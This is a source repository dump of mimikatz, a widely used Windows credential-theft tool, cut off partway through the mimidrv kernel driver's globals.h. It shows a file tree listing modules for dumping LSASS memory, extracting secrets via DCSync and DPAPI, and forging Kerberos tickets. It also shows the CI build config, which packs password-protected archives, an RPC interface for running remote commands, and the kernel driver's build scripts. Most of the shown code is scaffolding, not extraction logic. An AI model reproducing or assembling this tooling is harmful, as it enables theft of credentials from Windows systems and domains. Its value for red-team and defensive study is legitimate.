├── README.md
├── appveyor.yml
├── inc
├── DbgHelp.h
├── DhcpSSdk.h
├── DsGetDC.h
├── Fci.h
├── Midles.h
├── NTSecPKG.h
├── PshPack8.h
├── SubAuth.h
├── WDBGEXTS.H
├── WinBer.h
├── WinDNS.h
├── Winldap.h
├── cardmod.h
├── fltUser.h
├── fltUserStructures.h
├── globals.h
├── msasn1.h
├── schannel.h
├── schnlsp.h
└── wincred.h
├── kiwi_passwords.yar
├── lib
├── Win32
│ ├── advapi32.hash.lib
│ ├── bcrypt.lib
│ ├── cryptdll.lib
│ ├── fltlib.lib
│ ├── hid.lib
│ ├── msasn1.min.lib
│ ├── ncrypt.lib
│ ├── netapi32.min.lib
│ ├── ntdll.min.lib
│ ├── samlib.lib
│ └── winsta.lib
├── arm64
│ ├── advapi32.hash.lib
│ ├── msasn1.min.lib
│ ├── netapi32.min.lib
│ └── ntdll.min.lib
└── x64
│ ├── advapi32.hash.lib
│ ├── bcrypt.lib
│ ├── cryptdll.lib
│ ├── fltlib.lib
│ ├── hid.lib
│ ├── msasn1.min.lib
│ ├── ncrypt.lib
│ ├── netapi32.min.lib
│ ├── ntdll.min.lib
│ ├── samlib.lib
│ └── winsta.lib
├── mimicom.idl
├── mimidrv
├── MAKEFILE
├── SOURCES
├── _build_.cmd
├── _clean_.cmd
├── _rebuild_.cmd
├── globals.h
├── ioctl.h
├── kkll_m_filters.c
├── kkll_m_filters.h
├── kkll_m_memory.c
├── kkll_m_memory.h
├── kkll_m_modules.c
├── kkll_m_modules.h
├── kkll_m_notify.c
├── kkll_m_notify.h
├── kkll_m_process.c
├── kkll_m_process.h
├── kkll_m_ssdt.c
├── kkll_m_ssdt.h
├── mimidrv.c
├── mimidrv.h
├── mimidrv.rc
├── mimidrv.vcxproj
└── mimidrv.vcxproj.filters
├── mimikatz.sln
├── mimikatz
├── mimikatz.c
├── mimikatz.h
├── mimikatz.ico
├── mimikatz.rc
├── mimikatz.vcxproj
├── mimikatz.vcxproj.filters
└── modules
│ ├── crypto
│ ├── kuhl_m_crypto_extractor.c
│ ├── kuhl_m_crypto_extractor.h
│ ├── kuhl_m_crypto_patch.c
│ ├── kuhl_m_crypto_patch.h
│ ├── kuhl_m_crypto_pki.c
│ ├── kuhl_m_crypto_pki.h
│ ├── kuhl_m_crypto_sc.c
│ └── kuhl_m_crypto_sc.h
│ ├── dpapi
│ ├── kuhl_m_dpapi.c
│ ├── kuhl_m_dpapi.h
│ ├── kuhl_m_dpapi_oe.c
│ ├── kuhl_m_dpapi_oe.h
│ └── packages
│ │ ├── kuhl_m_dpapi_chrome.c
│ │ ├── kuhl_m_dpapi_chrome.h
│ │ ├── kuhl_m_dpapi_citrix.c
│ │ ├── kuhl_m_dpapi_citrix.h
│ │ ├── kuhl_m_dpapi_cloudap.c
│ │ ├── kuhl_m_dpapi_cloudap.h
│ │ ├── kuhl_m_dpapi_creds.c
│ │ ├── kuhl_m_dpapi_creds.h
│ │ ├── kuhl_m_dpapi_keys.c
│ │ ├── kuhl_m_dpapi_keys.h
│ │ ├── kuhl_m_dpapi_lunahsm.c
│ │ ├── kuhl_m_dpapi_lunahsm.h
│ │ ├── kuhl_m_dpapi_powershell.c
│ │ ├── kuhl_m_dpapi_powershell.h
│ │ ├── kuhl_m_dpapi_rdg.c
│ │ ├── kuhl_m_dpapi_rdg.h
│ │ ├── kuhl_m_dpapi_sccm.c
│ │ ├── kuhl_m_dpapi_sccm.h
│ │ ├── kuhl_m_dpapi_ssh.c
│ │ ├── kuhl_m_dpapi_ssh.h
│ │ ├── kuhl_m_dpapi_wlan.c
│ │ └── kuhl_m_dpapi_wlan.h
│ ├── kerberos
│ ├── kuhl_m_kerberos.c
│ ├── kuhl_m_kerberos.h
│ ├── kuhl_m_kerberos_ccache.c
│ ├── kuhl_m_kerberos_ccache.h
│ ├── kuhl_m_kerberos_claims.c
│ ├── kuhl_m_kerberos_claims.h
│ ├── kuhl_m_kerberos_pac.c
│ ├── kuhl_m_kerberos_pac.h
│ ├── kuhl_m_kerberos_ticket.c
│ └── kuhl_m_kerberos_ticket.h
│ ├── kuhl_m.h
│ ├── kuhl_m_acr.c
│ ├── kuhl_m_acr.h
│ ├── kuhl_m_busylight.c
│ ├── kuhl_m_busylight.h
│ ├── kuhl_m_crypto.c
│ ├── kuhl_m_crypto.h
│ ├── kuhl_m_dpapi.c
│ ├── kuhl_m_dpapi.h
│ ├── kuhl_m_event.c
│ ├── kuhl_m_event.h
│ ├── kuhl_m_iis.c
│ ├── kuhl_m_iis.h
│ ├── kuhl_m_kernel.c
│ ├── kuhl_m_kernel.h
│ ├── kuhl_m_lsadump.c
│ ├── kuhl_m_lsadump.h
│ ├── kuhl_m_lsadump_remote.c
│ ├── kuhl_m_lsadump_remote.h
│ ├── kuhl_m_minesweeper.c
│ ├── kuhl_m_minesweeper.h
│ ├── kuhl_m_misc.c
│ ├── kuhl_m_misc.h
│ ├── kuhl_m_net.c
│ ├── kuhl_m_net.h
│ ├── kuhl_m_privilege.c
│ ├── kuhl_m_privilege.h
│ ├── kuhl_m_process.c
│ ├── kuhl_m_process.h
│ ├── kuhl_m_rdm.c
│ ├── kuhl_m_rdm.h
│ ├── kuhl_m_rpc.c
│ ├── kuhl_m_rpc.h
│ ├── kuhl_m_service.c
│ ├── kuhl_m_service.h
│ ├── kuhl_m_service_remote.c
│ ├── kuhl_m_service_remote.h
│ ├── kuhl_m_sid.c
│ ├── kuhl_m_sid.h
│ ├── kuhl_m_sr98.c
│ ├── kuhl_m_sr98.h
│ ├── kuhl_m_standard.c
│ ├── kuhl_m_standard.h
│ ├── kuhl_m_sysenvvalue.c
│ ├── kuhl_m_sysenvvalue.h
│ ├── kuhl_m_token.c
│ ├── kuhl_m_token.h
│ ├── kuhl_m_ts.c
│ ├── kuhl_m_ts.h
│ ├── kuhl_m_vault.c
│ ├── kuhl_m_vault.h
│ ├── lsadump
│ ├── kuhl_m_lsadump_dc.c
│ └── kuhl_m_lsadump_dc.h
│ ├── misc
│ ├── kuhl_m_misc_citrix.c
│ ├── kuhl_m_misc_citrix.h
│ ├── kuhl_m_misc_djoin.c
│ └── kuhl_m_misc_djoin.h
│ ├── ngc
│ ├── kuhl_m_ngc.c
│ └── kuhl_m_ngc.h
│ └── sekurlsa
│ ├── crypto
│ ├── kuhl_m_sekurlsa_nt5.c
│ ├── kuhl_m_sekurlsa_nt5.h
│ ├── kuhl_m_sekurlsa_nt6.c
│ └── kuhl_m_sekurlsa_nt6.h
│ ├── globals_sekurlsa.h
│ ├── kuhl_m_sekurlsa.c
│ ├── kuhl_m_sekurlsa.h
│ ├── kuhl_m_sekurlsa_sk.c
│ ├── kuhl_m_sekurlsa_sk.h
│ ├── kuhl_m_sekurlsa_utils.c
│ ├── kuhl_m_sekurlsa_utils.h
│ └── packages
│ ├── kuhl_m_sekurlsa_cloudap.c
│ ├── kuhl_m_sekurlsa_cloudap.h
│ ├── kuhl_m_sekurlsa_credman.c
│ ├── kuhl_m_sekurlsa_credman.h
│ ├── kuhl_m_sekurlsa_dpapi.c
│ ├── kuhl_m_sekurlsa_dpapi.h
│ ├── kuhl_m_sekurlsa_kerberos.c
│ ├── kuhl_m_sekurlsa_kerberos.h
│ ├── kuhl_m_sekurlsa_livessp.c
│ ├── kuhl_m_sekurlsa_livessp.h
│ ├── kuhl_m_sekurlsa_msv1_0.c
│ ├── kuhl_m_sekurlsa_msv1_0.h
│ ├── kuhl_m_sekurlsa_ssp.c
│ ├── kuhl_m_sekurlsa_ssp.h
│ ├── kuhl_m_sekurlsa_tspkg.c
│ ├── kuhl_m_sekurlsa_tspkg.h
│ ├── kuhl_m_sekurlsa_wdigest.c
│ └── kuhl_m_sekurlsa_wdigest.h
├── mimilib
├── kappfree.c
├── kcredentialprovider.c
├── kcredentialprovider.h
├── kdhcp.c
├── kdhcp.h
├── kdns.c
├── kdns.h
├── kfilt.c
├── kfilt.h
├── knp.c
├── knp.h
├── kssp.c
├── kssp.h
├── ksub.c
├── ksub.h
├── mimilib.def
├── mimilib.rc
├── mimilib.vcxproj
├── mimilib.vcxproj.filters
├── sekurlsadbg
│ ├── kuhl_m_sekurlsa_nt6.c
│ ├── kuhl_m_sekurlsa_nt6.h
│ ├── kuhl_m_sekurlsa_packages.c
│ ├── kuhl_m_sekurlsa_packages.h
│ ├── kuhl_m_sekurlsa_utils.c
│ ├── kuhl_m_sekurlsa_utils.h
│ ├── kull_m_rpc.c
│ ├── kull_m_rpc.h
│ ├── kull_m_rpc_ms-credentialkeys.c
│ ├── kull_m_rpc_ms-credentialkeys.h
│ ├── kwindbg.c
│ └── kwindbg.h
├── utils.c
└── utils.h
├── mimilove
├── mimilove.c
├── mimilove.h
├── mimilove.rc
├── mimilove.vcxproj
└── mimilove.vcxproj.filters
├── mimispool
├── README.md
├── mimispool.c
├── mimispool.def
├── mimispool.h
├── mimispool.rc
├── mimispool.vcxproj
└── mimispool.vcxproj.filters
├── modules
├── kull_m_acr.c
├── kull_m_acr.h
├── kull_m_asn1.c
├── kull_m_asn1.h
├── kull_m_busylight.c
├── kull_m_busylight.h
├── kull_m_cabinet.c
├── kull_m_cabinet.h
├── kull_m_cred.c
├── kull_m_cred.h
├── kull_m_crypto.c
├── kull_m_crypto.h
├── kull_m_crypto_ngc.c
├── kull_m_crypto_ngc.h
├── kull_m_crypto_remote.c
├── kull_m_crypto_remote.h
├── kull_m_crypto_sk.c
├── kull_m_crypto_sk.h
├── kull_m_crypto_system.h
├── kull_m_dpapi.c
├── kull_m_dpapi.h
├── kull_m_file.c
├── kull_m_file.h
├── kull_m_handle.c
├── kull_m_handle.h
├── kull_m_hid.c
├── kull_m_hid.h
├── kull_m_kernel.c
├── kull_m_kernel.h
├── kull_m_key.c
├── kull_m_key.h
├── kull_m_ldap.c
├── kull_m_ldap.h
├── kull_m_memory.c
├── kull_m_memory.h
├── kull_m_mifare.h
├── kull_m_minidump.c
├── kull_m_minidump.h
├── kull_m_net.c
├── kull_m_net.h
├── kull_m_output.c
├── kull_m_output.h
├── kull_m_patch.c
├── kull_m_patch.h
├── kull_m_pipe.c
├── kull_m_pipe.h
├── kull_m_pn532.c
├── kull_m_pn532.h
├── kull_m_process.c
├── kull_m_process.h
├── kull_m_rdm.c
├── kull_m_rdm.h
├── kull_m_registry.c
├── kull_m_registry.h
├── kull_m_registry_structures.h
├── kull_m_remotelib.c
├── kull_m_remotelib.h
├── kull_m_samlib.h
├── kull_m_service.c
├── kull_m_service.h
├── kull_m_sr98.c
├── kull_m_sr98.h
├── kull_m_string.c
├── kull_m_string.h
├── kull_m_token.c
├── kull_m_token.h
├── kull_m_xml.c
├── kull_m_xml.h
├── rpc
│ ├── kull_m_rpc.c
│ ├── kull_m_rpc.h
│ ├── kull_m_rpc_bkrp.c
│ ├── kull_m_rpc_bkrp.h
│ ├── kull_m_rpc_dpapi-entries.c
│ ├── kull_m_rpc_dpapi-entries.h
│ ├── kull_m_rpc_drsr.c
│ ├── kull_m_rpc_drsr.h
│ ├── kull_m_rpc_mimicom.c
│ ├── kull_m_rpc_mimicom.h
│ ├── kull_m_rpc_ms-bkrp.h
│ ├── kull_m_rpc_ms-bkrp_c.c
│ ├── kull_m_rpc_ms-claims.c
│ ├── kull_m_rpc_ms-claims.h
│ ├── kull_m_rpc_ms-credentialkeys.c
│ ├── kull_m_rpc_ms-credentialkeys.h
│ ├── kull_m_rpc_ms-dcom_IObjectExporter.h
│ ├── kull_m_rpc_ms-dcom_IObjectExporter_c.c
│ ├── kull_m_rpc_ms-drsr.h
│ ├── kull_m_rpc_ms-drsr_c.c
│ ├── kull_m_rpc_ms-efsr.h
│ ├── kull_m_rpc_ms-efsr_c.c
│ ├── kull_m_rpc_ms-nrpc.h
│ ├── kull_m_rpc_ms-nrpc_c.c
│ ├── kull_m_rpc_ms-odj.c
│ ├── kull_m_rpc_ms-odj.h
│ ├── kull_m_rpc_ms-pac.c
│ ├── kull_m_rpc_ms-pac.h
│ ├── kull_m_rpc_ms-par.h
│ ├── kull_m_rpc_ms-par_c.c
│ ├── kull_m_rpc_ms-rprn.c
│ └── kull_m_rpc_ms-rprn.h
├── sqlite3.c
└── sqlite3.h
├── notrunk.lst
└── trunk.lst
/appveyor.yml:
--------------------------------------------------------------------------------
1 | version: 2.2.0-ci-{branch}-{build}
2 | image: Visual Studio 2013
3 | configuration: Release
4 | platform:
5 | - x64
6 | - Win32
7 | shallow_clone: true
8 | before_build:
9 | - ps: (Get-Content "C:\Program Files (x86)\Microsoft SDKs\Windows\v7.1A\Include\ntsecapi.h") | %{$_ -replace "^RtlDecryptMemory\(quot;, "__stdcall RtlDecryptMemory("} | Set-Content "C:\Program Files (x86)\Microsoft SDKs\Windows\v7.1A\Include\ntsecapi.h"
10 | build:
11 | parallel: true
12 | verbosity: normal
13 | after_build:
14 | - cmd: >-
15 | 7z a -t7z -mx -ms=on %APPVEYOR_PROJECT_NAME%_trunk_%PLATFORM%.7z -xr@notrunk.lst .\%PLATFORM% README.md kiwi_passwords.yar mimicom.idl
16 |
17 | 7z a -tzip -mx -mm=deflate -mpass=15 %APPVEYOR_PROJECT_NAME%_trunk_%PLATFORM%.zip -xr@notrunk.lst .\%PLATFORM% README.md kiwi_passwords.yar mimicom.idl
18 |
19 | 7z a -p%APPVEYOR_PROJECT_NAME% -mhe=on -t7z -mx -ms=on %APPVEYOR_PROJECT_NAME%_trunk_password_%PLATFORM%.7z -xr@notrunk.lst .\%PLATFORM% README.md kiwi_passwords.yar mimicom.idl
20 |
21 | 7z a -p%APPVEYOR_PROJECT_NAME% -tzip -mx -mm=deflate -mpass=15 %APPVEYOR_PROJECT_NAME%_trunk_password_%PLATFORM%.zip -xr@notrunk.lst .\%PLATFORM% README.md kiwi_passwords.yar mimicom.idl
22 | artifacts:
23 | - path: mimikatz_trunk_*
24 |
--------------------------------------------------------------------------------
/inc/PshPack8.h:
--------------------------------------------------------------------------------
1 | /*++
2 |
3 | Copyright (c) Microsoft Corporation. All rights reserved.
4 |
5 | Module Name:
6 |
7 | pshpack8.h
8 |
9 | Abstract:
10 |
11 | This file turns 8 byte packing of structures on. (That is, it disables
12 | automatic alignment of structure fields.) An include file is needed
13 | because various compilers do this in different ways. For Microsoft
14 | compatible compilers, this files uses the push option to the pack pragma
15 | so that the poppack.h include file can restore the previous packing
16 | reliably.
17 |
18 | The file poppack.h is the complement to this file.
19 |
20 | --*/
21 |
22 | #if ! (defined(lint) || defined(RC_INVOKED))
23 | #if ( _MSC_VER >= 800 && !defined(_M_I86)) || defined(_PUSHPOP_SUPPORTED)
24 | #pragma warning(disable:4103)
25 | #if !(defined( MIDL_PASS )) || defined( __midl )
26 | #pragma pack(push,8)
27 | #else
28 | #pragma pack(8)
29 | #endif
30 | #else
31 | #pragma pack(8)
32 | #endif
33 | #endif /* ! (defined(lint) || defined(RC_INVOKED)) */
34 |
35 |
--------------------------------------------------------------------------------
/inc/schnlsp.h:
--------------------------------------------------------------------------------
1 | //+---------------------------------------------------------------------------
2 | //
3 | // Microsoft Windows
4 | // Copyright (C) Microsoft Corporation, 1992-1999.
5 | //
6 | // File: schnlsp.h
7 | //
8 | // Contents: Public Definitions for SCHANNEL Security Provider
9 | //
10 | // Classes:
11 | //
12 | // Functions:
13 | //
14 | //----------------------------------------------------------------------------
15 |
16 | #ifndef __SCHNLSP_H__
17 | #define __SCHNLSP_H__
18 |
19 | #if _MSC_VER > 1000
20 | #pragma once
21 | #endif
22 |
23 | #include <schannel.h>
24 |
25 |
26 | #endif //__SCHNLSP_H__
27 |
28 |
--------------------------------------------------------------------------------
/lib/Win32/advapi32.hash.lib:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/gentilkiwi/mimikatz/152b208916c27d7d1fc32d10e64879721c4d06af/lib/Win32/advapi32.hash.lib
--------------------------------------------------------------------------------
/lib/Win32/bcrypt.lib:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/gentilkiwi/mimikatz/152b208916c27d7d1fc32d10e64879721c4d06af/lib/Win32/bcrypt.lib
--------------------------------------------------------------------------------
/lib/Win32/cryptdll.lib:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/gentilkiwi/mimikatz/152b208916c27d7d1fc32d10e64879721c4d06af/lib/Win32/cryptdll.lib
--------------------------------------------------------------------------------
/lib/Win32/fltlib.lib:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/gentilkiwi/mimikatz/152b208916c27d7d1fc32d10e64879721c4d06af/lib/Win32/fltlib.lib
--------------------------------------------------------------------------------
/lib/Win32/hid.lib:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/gentilkiwi/mimikatz/152b208916c27d7d1fc32d10e64879721c4d06af/lib/Win32/hid.lib
--------------------------------------------------------------------------------
/lib/Win32/msasn1.min.lib:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/gentilkiwi/mimikatz/152b208916c27d7d1fc32d10e64879721c4d06af/lib/Win32/msasn1.min.lib
--------------------------------------------------------------------------------
/lib/Win32/ncrypt.lib:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/gentilkiwi/mimikatz/152b208916c27d7d1fc32d10e64879721c4d06af/lib/Win32/ncrypt.lib
--------------------------------------------------------------------------------
/lib/Win32/netapi32.min.lib:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/gentilkiwi/mimikatz/152b208916c27d7d1fc32d10e64879721c4d06af/lib/Win32/netapi32.min.lib
--------------------------------------------------------------------------------
/lib/Win32/ntdll.min.lib:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/gentilkiwi/mimikatz/152b208916c27d7d1fc32d10e64879721c4d06af/lib/Win32/ntdll.min.lib
--------------------------------------------------------------------------------
/lib/Win32/samlib.lib:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/gentilkiwi/mimikatz/152b208916c27d7d1fc32d10e64879721c4d06af/lib/Win32/samlib.lib
--------------------------------------------------------------------------------
/lib/Win32/winsta.lib:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/gentilkiwi/mimikatz/152b208916c27d7d1fc32d10e64879721c4d06af/lib/Win32/winsta.lib
--------------------------------------------------------------------------------
/lib/arm64/advapi32.hash.lib:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/gentilkiwi/mimikatz/152b208916c27d7d1fc32d10e64879721c4d06af/lib/arm64/advapi32.hash.lib
--------------------------------------------------------------------------------
/lib/arm64/msasn1.min.lib:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/gentilkiwi/mimikatz/152b208916c27d7d1fc32d10e64879721c4d06af/lib/arm64/msasn1.min.lib
--------------------------------------------------------------------------------
/lib/arm64/netapi32.min.lib:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/gentilkiwi/mimikatz/152b208916c27d7d1fc32d10e64879721c4d06af/lib/arm64/netapi32.min.lib
--------------------------------------------------------------------------------
/lib/arm64/ntdll.min.lib:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/gentilkiwi/mimikatz/152b208916c27d7d1fc32d10e64879721c4d06af/lib/arm64/ntdll.min.lib
--------------------------------------------------------------------------------
/lib/x64/advapi32.hash.lib:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/gentilkiwi/mimikatz/152b208916c27d7d1fc32d10e64879721c4d06af/lib/x64/advapi32.hash.lib
--------------------------------------------------------------------------------
/lib/x64/bcrypt.lib:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/gentilkiwi/mimikatz/152b208916c27d7d1fc32d10e64879721c4d06af/lib/x64/bcrypt.lib
--------------------------------------------------------------------------------
/lib/x64/cryptdll.lib:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/gentilkiwi/mimikatz/152b208916c27d7d1fc32d10e64879721c4d06af/lib/x64/cryptdll.lib
--------------------------------------------------------------------------------
/lib/x64/fltlib.lib:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/gentilkiwi/mimikatz/152b208916c27d7d1fc32d10e64879721c4d06af/lib/x64/fltlib.lib
--------------------------------------------------------------------------------
/lib/x64/hid.lib:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/gentilkiwi/mimikatz/152b208916c27d7d1fc32d10e64879721c4d06af/lib/x64/hid.lib
--------------------------------------------------------------------------------
/lib/x64/msasn1.min.lib:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/gentilkiwi/mimikatz/152b208916c27d7d1fc32d10e64879721c4d06af/lib/x64/msasn1.min.lib
--------------------------------------------------------------------------------
/lib/x64/ncrypt.lib:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/gentilkiwi/mimikatz/152b208916c27d7d1fc32d10e64879721c4d06af/lib/x64/ncrypt.lib
--------------------------------------------------------------------------------
/lib/x64/netapi32.min.lib:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/gentilkiwi/mimikatz/152b208916c27d7d1fc32d10e64879721c4d06af/lib/x64/netapi32.min.lib
--------------------------------------------------------------------------------
/lib/x64/ntdll.min.lib:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/gentilkiwi/mimikatz/152b208916c27d7d1fc32d10e64879721c4d06af/lib/x64/ntdll.min.lib
--------------------------------------------------------------------------------
/lib/x64/samlib.lib:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/gentilkiwi/mimikatz/152b208916c27d7d1fc32d10e64879721c4d06af/lib/x64/samlib.lib
--------------------------------------------------------------------------------
/lib/x64/winsta.lib:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/gentilkiwi/mimikatz/152b208916c27d7d1fc32d10e64879721c4d06af/lib/x64/winsta.lib
--------------------------------------------------------------------------------
/mimicom.idl:
--------------------------------------------------------------------------------
1 | import "ms-dtyp.idl";
2 | [
3 | uuid(17FC11E9-C258-4B8D-8D07-2F4125156244),
4 | version(1.0)
5 | ]
6 | interface MimiCom
7 | {
8 | typedef [context_handle] void* MIMI_HANDLE;
9 |
10 | typedef unsigned int ALG_ID;
11 | typedef struct _MIMI_PUBLICKEY {
12 | ALG_ID sessionType;
13 | DWORD cbPublicKey;
14 | [size_is(cbPublicKey)] BYTE *pbPublicKey;
15 | } MIMI_PUBLICKEY, *PMIMI_PUBLICKEY;
16 |
17 | NTSTATUS MimiBind(
18 | [in] handle_t rpc_handle,
19 | [in, ref] PMIMI_PUBLICKEY clientPublicKey,
20 | [out, ref] PMIMI_PUBLICKEY serverPublicKey,
21 | [out, ref] MIMI_HANDLE *phMimi
22 | );
23 |
24 | NTSTATUS MiniUnbind(
25 | [in, out, ref] MIMI_HANDLE *phMimi
26 | );
27 |
28 | NTSTATUS MimiCommand(
29 | [in, ref] MIMI_HANDLE phMimi,
30 | [in] DWORD szEncCommand,
31 | [in, size_is(szEncCommand), unique] BYTE *encCommand,
32 | [out, ref] DWORD *szEncResult,
33 | [out, size_is(, *szEncResult)] BYTE **encResult
34 | );
35 |
36 | NTSTATUS MimiClear(
37 | [in] handle_t rpc_handle,
38 | [in, string] wchar_t *command,
39 | [out] DWORD *size,
40 | [out, size_is(, *size)] wchar_t **result
41 | );
42 | }
43 |
44 | // Privacy of RPC exchange can be ~guaranteed by protocol, *except when not using authentication*
45 | // mimikatz try to avoid clear credentials on the network by using basic encryption at application level.
46 | //
47 | // Diffie-Hellman key exchange
48 | // ===========================
49 | //
50 | // > Parameters used: Second Oakley Group ( https://tools.ietf.org/html/rfc2409#section-6.2 )
51 | //
52 | // * ALG_ID sessionType
53 | // session key type to use after DH exchange, it can be: CALG_CYLINK_MEK(0x660c), CALG_RC2(0x6602), CALG_RC4(0x6801), CALG_DES(0x6601), CALG_3DES_112(0x6609) or CALG_3DES(0x6603)
54 | // see: https://msdn.microsoft.com/library/windows/desktop/bb394802.aspx and https://msdn.microsoft.com/library/windows/desktop/aa375549.aspx
55 | //
56 | // * DWORD cbPublicKey
57 | // size of pbPublicKey: 144 (sizeof(PUBLICKEYSTRUC) + sizeof(DHPUBKEY) + sizeof(1024bits key)
58 | //
59 | // * BYTE *pbPublicKey
60 | // PUBLICKEYBLOB structure of the DH key ( https://msdn.microsoft.com/en-us/library/windows/desktop/aa381970(v=vs.85).aspx#code-snippet-1 )
61 | //
62 | // Example:
63 | // --------
64 | // 06 02 00 00 PUBLICKEYBLOB (06), CUR_BLOB_VERSION (02), reserved (00 00)
65 | // 02 aa 00 00 ALG_ID: CALG_DH_EPHEM(0xaa02)
66 | //
67 | // 00 44 48 31 Magic : \0DH1
68 | // 00 04 00 00 1024bits (128bytes bellow)
69 | // a9 90 e8 86 59 2d 88 a7 32 e1 05 35 26 24 d9 fd
70 | // ae f5 53 46 ca a4 79 cc a9 a3 57 45 e8 54 e7 fd
71 | // fe 99 24 df 71 6a 44 2c f7 0a 09 ac e4 e6 44 f8
72 | // 4c 51 63 c3 86 1e 14 4a 9a f0 e0 a9 e0 38 26 72
73 | // 75 27 cb 60 9f 0d 15 2c 37 39 a0 b0 72 b6 14 85
74 | // 5f 18 7f c0 0d 26 d1 3b 6f 14 c1 99 22 8f 74 ef
75 | // 68 0c 24 bb 77 ff b3 c5 9e ed ff 76 71 c1 ee ce
76 | // eb 77 46 00 52 d8 4c 5c bc af fd 28 3d 76 83 b3
77 | //
78 | // > Don't forget you may need to reverse some key bytearrays from Windows point of view, and to reset session key state between calls ;)
--------------------------------------------------------------------------------
/mimidrv/MAKEFILE:
--------------------------------------------------------------------------------
1 | !INCLUDE $(NTMAKEENV)\makefile.def
2 |
--------------------------------------------------------------------------------
/mimidrv/SOURCES:
--------------------------------------------------------------------------------
1 | TARGETNAME=mimidrv
2 | TARGETPATH=OBJ
3 | TARGETTYPE=DRIVER
4 | SOURCES=mimidrv.c \
5 | mimidrv.rc \
6 | kkll_m_process.c \
7 | kkll_m_modules.c \
8 | kkll_m_memory.c \
9 | kkll_m_ssdt.c \
10 | kkll_m_notify.c \
11 | kkll_m_filters.c
12 |
13 | TARGETLIBS= $(TARGETLIBS) $(IFSKIT_LIB_PATH)\fltmgr.lib $(BASEDIR)\lib\wlh\*\aux_klib.lib $(DDK_LIB_PATH)\ntstrsafe.lib
--------------------------------------------------------------------------------
/mimidrv/_build_.cmd:
--------------------------------------------------------------------------------
1 | @echo off
2 | set winddk=%SystemDrive%\WinDDK\7600.16385.1
3 |
4 | set mimidrv=%~dp0
5 | set path=%systemroot%;%systemroot%\system32
6 | set origplatform=%1
7 | set destination=%2
8 |
9 | if %origplatform%==Win32 (
10 | set platform=x86
11 | set beginsource=x86
12 | set endsource=i386
13 | ) else (
14 | set platform=x64
15 | set beginsource=amd64
16 | set endsource=amd64
17 | )
18 |
19 | if exist %winddk% (
20 | call %winddk%\bin\setenv.bat %winddk%\ fre %platform% WNET no_oacr
21 | cd /d %mimidrv%
22 | build
23 | if errorlevel 0 (copy /y %mimidrv%\objfre_wnet_%beginsource%\%endsource%\*.sys %destination%) else echo Build failed :(
24 | ) else echo No WDK found :(
25 |
26 | rd /s /q %mimidrv%\obj
27 | rd /s /q %mimidrv%\%origplatform%
--------------------------------------------------------------------------------
/mimidrv/_clean_.cmd:
--------------------------------------------------------------------------------
1 | @echo off
2 | set mimidrv=%~dp0
3 | set path=%systemroot%;%systemroot%\system32
4 |
5 | set origplatform=%1
6 | set destination=%2
7 |
8 | if %origplatform%==Win32 (
9 | set platform=x86
10 | set beginsource=x86
11 | set endsource=i386
12 | ) else (
13 | set platform=x64
14 | set beginsource=amd64
15 | set endsource=amd64
16 | )
17 |
18 | del /f /q /a %destination%\*.sys
19 | rd /s /q %mimidrv%\obj
20 | rd /s /q %mimidrv%\objfre_wnet_%beginsource%
21 | del /f /q /a %mimidrv%\buildfre_wnet_%beginsource%.log
--------------------------------------------------------------------------------
/mimidrv/_rebuild_.cmd:
--------------------------------------------------------------------------------
1 | @echo off
2 | call _clean_.cmd %1 "%2"
3 | call _build_.cmd %1 "%2"
--------------------------------------------------------------------------------
/mimidrv/globals.h:
--------------------------------------------------------------------------------
1 | /* Benjamin DELPY `gentilkiwi`
2 | https://blog.gentilkiwi.com
3 | benjamin@gentilkiwi.com
4 | Licence : https://creativecommons.org/licenses/by/4.0/
5 | */
6 | #pragma once
7 | #include <ntifs.h>
8 | #include <fltkernel.h>
9 | #include <ntddk.h>
10 | #include <aux_klib.h>
11 | #include <ntstrsafe.h>
12 | #include <string.h>
13 | #include "ioctl.h"
14 |
15 | #define POOL_TAG 'kiwi'
16 | #define MIMIDRV L"mimidrv"
17 |
18 | #define kprintf(KiwiBuffer, Format, ...) (RtlStringCbPrintfExW(*(KiwiBuffer)->Buffer, *(KiwiBuffer)->szBuffer, (KiwiBuffer)->Buffer, (KiwiBuffer)->szBuffer, STRSAFE_NO_TRUNCATION, Format, __VA_ARGS__))
19 |
20 | extern char * PsGetProcessImageFileName(PEPROCESS monProcess);
21 | extern NTSYSAPI NTSTATUS NTAPI ZwSetInformationProcess (__in HANDLE ProcessHandle, __in PROCESSINFOCLASS ProcessInformationClass, __in_bcount(ProcessInformationLength) PVOID ProcessInformation, __in ULONG ProcessInformationLength);
22 | extern NTSYSAPI NTSTATUS NTAPI ZwUnloadKey(IN POBJECT_ATTRIBUTES DestinationKeyName);
23 |
24 | typedef struct _KIWI_BUFFER {
25 | size_t * szBuffer;
26 | PWSTR * Buffer;
27 | } KIWI_BUFFER, *PKIWI_BUFFER;
28 |
29 | typedef enum _KIWI_OS_INDEX {
30 | KiwiOsIndex_UNK = 0,
31 | KiwiOsIndex_XP = 1,
32 | KiwiOsIndex_2K3 = 2,
33 | KiwiOsIndex_VISTA = 3,
34 | KiwiOsIndex_7 = 4,
35 | KiwiOsIndex_8 = 5,
36 | KiwiOsIndex_BLUE = 6,
37 | KiwiOsIndex_10_1507 = 7,
38 | KiwiOsIndex_10_1511 = 8,
39 | KiwiOsIndex_10_1607 = 9,
